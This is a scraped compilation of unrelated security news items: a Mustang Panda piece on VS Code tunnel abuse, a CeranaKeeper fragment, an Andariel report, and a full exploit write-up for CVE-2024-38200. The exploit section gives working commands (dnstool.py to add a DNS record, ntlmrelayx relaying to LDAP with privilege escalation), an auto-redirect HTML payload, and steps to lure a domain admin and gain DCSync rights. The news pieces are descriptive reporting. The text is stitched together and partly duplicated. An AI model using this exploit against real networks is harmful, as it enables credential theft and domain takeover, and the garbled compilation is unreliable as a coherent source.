Calling out CeranaKeeper's ability to quickly write and rewrite its toolset as required to evade detection, the company said the threat actor's end goal is to develop bespoke malware that can allow it to collect valuable information on a large scale.

"Mustang Panda and CeranaKeeper seem to operate independently of each other, and each has its own toolset," it said. "Both threat actors may rely on the same third party, such as a digital quartermaster, which is not uncommon among China-aligned groups, or have some level of information sharing, which would explain the links that have been observed."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

China-Linked CeranaKeeper Targeting Southeast Asia with Data Exfiltration

The prolific Chinese APT Mustang Panda is the likely culprit behind a sophisticated cyber-espionage attack that sets up persistent remote access to victim machines.

Source: Gerry Pearce via Alamy Stock Photo

A known Chinese advanced persistent threat (APT) group known as Mustang Panda is the likely culprit behind a sophisticated, ongoing cyber-espionage campaign. It starts with a malicious email, and ultimately uses Visual Studio Code (VS Code) to distribute Python-based malware that gives attackers unauthorized and persistent remote access to infected machines.

Researchers from Cyble Research and Intelligence Lab (CRIL) discovered the campaign, which spreads an .lnk file disguised as a legitimate setup file to download a Python distribution package. In reality, it's used to run a malicious Python script. The attack relies upon the use of VS Code, which, if not present on the machine, will be deployed via the installation of the VS Code command line interface (CLI) by the attacker, the researchers noted in analysis published Oct. 2.

"The \[threat actor (TA)\] leverages a \[VS Code\] tool to initiate a remote tunnel and retrieve an activation code, which the TA can use to gain unauthorized remote access to the victim’s machine," according to the blog post about the attack. "This enables the TA to interact with the system, access files, and perform additional malicious activities," which include exfiltrating data and delivering further malware.

Related:Dragos Expands ICS Platform With New Acquisition

Though attribution for the attack is not entirely clear, the researchers found Chinese-language elements and identified tactics, techniques, and procedures (TTPs) in the attack flow that point to the Chinese APT group perhaps best known as Mustang Panda. Cyble tracks it as Stately Taurus, and it also goes by the names Bronze President, Camaro Dragon, Earth Preta, Luminous Moth, and Red Delta.

The attack starts with the execution of the .lnk file, which displays a fake “successful installation” message in Chinese while it silently downloads additional components in the background. Among those is a Python distribution package, which eventually downloads a malicious script. This is the aforementioned Python script, which once executed checks whether VS Code is already installed on the system by checking for the existence of a particular directory. If it is not found, the script then proceeds to download the VS Code command line interface (CLI) from a Microsoft source.

Eventually, this script sets up a task to ensure the persistence of its malicious activities, which include establishing a remote tunnel to give attackers access to the infected machine. When establishing the tunnel, the attackers use VS Code Remote-Tunnels, an extension typically used to connect to a remote machine, such as a desktop PC or virtual machine (VM), via a secure tunnel, according to Cyble. "This enables users to \[remotely\] access the machine from any \[VS Code\] client without the need for SSH," according to the post.

Related:Millions of Kia Vehicles Open to Remote Hacks via License Plate

The attackers also leverage another legitimate entity, the developer repository GitHub, in a strategic way to access files on the infected machine. When setting up the remote tunnel, the script automatically associates it with a GitHub account for authentication, and extracts an activation code to enable further malicious activity later in the attack.

The malware also extracts a list of processes currently running on the victim’s machine and sends them directly to the command-and-control (C2) server, and goes on to gather further sensitive data, such as the system’s language settings, geographical location, computer name, user name, user domain, and details about user privileges. It also collects the names of folders from several directories.

After the attackers receive the exfiltrated data, they can log in for remote access to the device using a GitHub account. "Here, the TA can enter the exfiltrated alphanumeric activation code to gain unauthorized access to the victim’s machine," according to Cyble.

Related:Pwn2Own Auto Offers $500K for Tesla Hacks

"This degree of access not only enables them to browse through the victims’ files but also enables them to execute commands through the terminal," according to the post. "With this control, the TA can perform a variety of actions, such as installing malware, extracting sensitive information, or altering system settings, potentially leading to further exploitation of the victim’s system and data."

**APT Defense Requires Cyber Vigilance**

At the time Cyble published the research, the malicious Python script deployed by the attack had no detections on VirusTotal, which makes it difficult for defenders to detect it through standard security tools, the researchers noted.

To mitigate these kinds of attacks by sophisticated APTs like Mustang Panda, Cyble recommends that organizations use advanced endpoint protection solutions that include behavioral analysis and machine-learning capabilities to detect and block suspicious activities, even those involving legitimate applications like VS Code. Defenders also should review scheduled tasks on all systems regularly to identify unauthorized or unusual entries, which can help detect persistence mechanisms established by threat actors.

Other mitigation activities include setting up training sessions to educate users about the risks of opening suspicious files or links, particularly those related to .lnk files and unknown sources. Organizations also as a general rule should limit user permissions to install software, particularly for tools that can be exploited, like VS Code, as well as use application whitelisting to control which applications can be installed and run on systems.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Python-Based Malware Slithers Into Systems via Legit VS Code

Microsoft Office 2019 MSO build 1808 (16.0.10411.20011) and Microsoft 365 MSO version 2403 build 16.0.17425.20176 suffer from an NTLMv2 hash disclosure vulnerability.

# Exploit Title: Microsoft Office NTLMv2 Disclosure Vulnerability  
# Exploit Author: Metin Yunus Kandemir  
# Vendor Homepage: https://www.office.com/  
# Software Link: https://www.office.com/  
# Details: https://github.com/passtheticket/CVE-2024-38200  
# Version: Microsoft Office 2019 MSO Build 1808 (16.0.10411.20011), Microsoft 365 MSO (Version 2403 Build 16.0.17425.20176)  
# Tested against: Windows 11  
# CVE: CVE-2024-38200

# Description  
MS Office URI schemes allow for fetching a document from remote source.   
MS URI scheme format is '< scheme-name >:< command-name >"|"< command-argument-descriptor > "|"< command-argument >' .  
Example: ms-word:ofe|u|http://hostname:port/leak.docx  
When the URI "ms-word:ofe|u|http://hostname:port/leak.docx" is invoked from a victim computer. This behaviour is abused to capture and relay NTLMv2 hash over SMB and HTTP. For detailed information about capturing a victim user's NTLMv2 hash over SMB, you can also visit https://www.privsec.nz/releases/ms-office-uri-handlers.

# Proof Of Concept  
 If we add a DNS A record and use this record within the Office URI, Windows will consider the hostname as part of the Intranet Zone. In this way, NTLMv2 authentication occurs automatically and a standard user can escalate privileges without needing a misconfigured GPO. Any domain user with standard privileges can add a non-existent DNS record so this attack works with default settings for a domain user.

1. Add a DNS record to resolve hostname to attacker IP address which runs ntlmrelayx. It takes approximately 5 minutes for the created record to start resolving.  
$ python dnstool.py -u 'unsafe.local\testuser' -p 'pass' -r 'attackerhost' --action 'add' --data [attacker-host-IP] [DC-IP] --zone unsafe.local

2. Fire up ntlmrelayx with following command  
$ python ntlmrelayx.py -t ldap://DC-IP-ADDRESS --escalate-user testuser --http-port 8080

3. Serve following HTML file using Apache server. Replace hostname with added record (e.g. attackerhost).

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Microsoft Office</title>  
</head>  
<body>  
    <a id="link" href="ms-word:ofe|u|http://hostname:port/leak.docx"></a>

    <script>  
        function navigateToLink() {  
            var link = document.getElementById('link');  
            if (link) {  
                var url = link.getAttribute('href');  
                window.location.href = url;  
            }  
        }  
        window.onload = navigateToLink;  
    </script>  
</body>  
</html> 

4. Send the URL of the above HTML file to a user with domain admin privileges. You should check whether the DNS record is resolved with the ping command before sending the URL. When the victim user navigates to the URL, clicking the 'Open' button is enough to capture the NTLMv2 hash. (no warning!)

5. The captured NTLMv2 hash over HTTP is relayed to Domain Controller with ntlmrelayx. As a result, a standard user can obtain DCSync and Enterprise Admins permissions under the default configurations with just two clicks.

Microsoft Office NTLMv2 Disclosure

Three different organizations in the U.S. were targeted in August 2024 by a North Korean state-sponsored threat actor called Andariel as part of a likely financially motivated attack.
"While the attackers didn't succeed in deploying ransomware on the networks of any of the organizations affected, it is likely that the attacks were financially motivated," Symantec, part of Broadcom, said in a

Three different organizations in the U.S. were targeted in August 2024 by a North Korean state-sponsored threat actor called Andariel as part of a likely financially motivated attack.

"While the attackers didn't succeed in deploying ransomware on the networks of any of the organizations affected, it is likely that the attacks were financially motivated," Symantec, part of Broadcom, said in a report shared with The Hacker News.

Andariel is a threat actor that's assessed to be a sub-cluster within the infamous Lazarus Group. It's also tracked as APT45, DarkSeoul, Nickel Hyatt, Onyx Sleet (formerly Plutonium), Operation Troy, Silent Chollima, and Stonefly. It's been active since at least 2009.

An element within North Korea's Reconnaissance General Bureau (RGB), the hacking crew has a track record of deploying ransomware strains such as SHATTEREDGLASS and Maui, while also developing an arsenal of custom backdoors like Dtrack (aka Valefor and Preft), TigerRAT, Black RAT (aka ValidAlpha), Dora RAT, and LightHand.

Some of the other lesser-known tools used by the threat actor include a data wiper codenamed Jokra and an advanced implant called Prioxer that allows for exchanging commands and data with a command-and-control (C2) server.

In July 2024, a North Korean military intelligence operative part of the Andariel group was indicted by the U.S. Department of Justice (DoJ) for allegedly carrying out ransomware attacks against healthcare facilities in the country and using the ill-gotten funds to conduct additional intrusions into defense, technology, and government entities across the world.

The latest set of attacks is characterized by the deployment of Dtrack, as well as another backdoor named Nukebot, which comes with capabilities to execute commands, download and upload files, and take screenshots.

"Nukebot has not been associated with Stonefly before; however, its source code was leaked and this is likely how Stonefly obtained the tool," Symantec said.

The exact method by which initial access was abstained is unclear, although Andariel has a habit of exploiting known N-day security flaws in internet-facing applications to breach target networks.

Some of the other programs used in the intrusions are Mimikatz, Sliver, Chisel, PuTTY, Plink, Snap2HTML, and FastReverseProxy (FRP), all of which are either open-sourced or publicly available.

The attackers have also been observed using an invalid certificate impersonating Tableau software to sign some of the tools, a tactic previously disclosed by Microsoft.

While Andariel has seen its focus shift to espionage operations since 2019, Symantec said its pivot to financially motivated attacks is a relatively recent development, one that has continued despite actions by the U.S. government.

"The group is likely continuing to attempt to mount extortion attacks against organizations in the U.S.," it added.

The development comes as Der Spiegel reported that German defense systems manufacturer Diehl Defense was compromised by a North Korean state-backed actor referred to as Kimsuky in a sophisticated spear-phishing attack that involved sending fake job offers from American defense contractors.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#microsoft